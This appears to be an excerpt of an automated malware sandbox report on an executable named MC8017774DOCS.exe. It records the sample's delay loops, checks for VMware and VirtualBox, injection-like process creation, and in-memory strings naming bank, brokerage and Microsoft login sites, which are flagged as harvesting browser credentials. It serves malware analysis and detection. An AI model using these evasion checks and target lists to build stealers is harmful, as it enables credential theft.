Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -595105s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594946s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884	Thread sleep time: -594406s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598389	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 595105	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594946	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594842	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Thread delayed: delay time: 594406	Jump to behavior

Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmwaretrat
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: vboxservice
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q#C:\windows\System32\vboxservice.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmwareuser
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Vmtoolsd
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Enables debug privileges

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Memory allocated: page read and write | page guard

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match

File source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

